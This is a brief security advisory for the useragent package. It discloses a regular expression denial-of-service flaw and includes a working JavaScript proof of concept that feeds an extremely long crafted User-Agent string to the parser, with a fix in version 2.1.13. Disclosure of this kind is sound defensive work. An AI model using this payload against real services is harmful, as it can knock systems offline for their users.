Affected versions of useragent
are vulnerable to regular expression denial of service when an arbitrarily long User-Agent
header is parsed.
var useragent = require('useragent');
var badUserAgent = 'MSIE 0.0'+Array(900000).join('0')+'XBLWP';
var request = 'GET / HTTP/1.1\r\nUser-Agent: ' + badUserAgent + '\r\n\r\n';
console.log(useragent.parse(request));
Update to version 2.1.13 or later.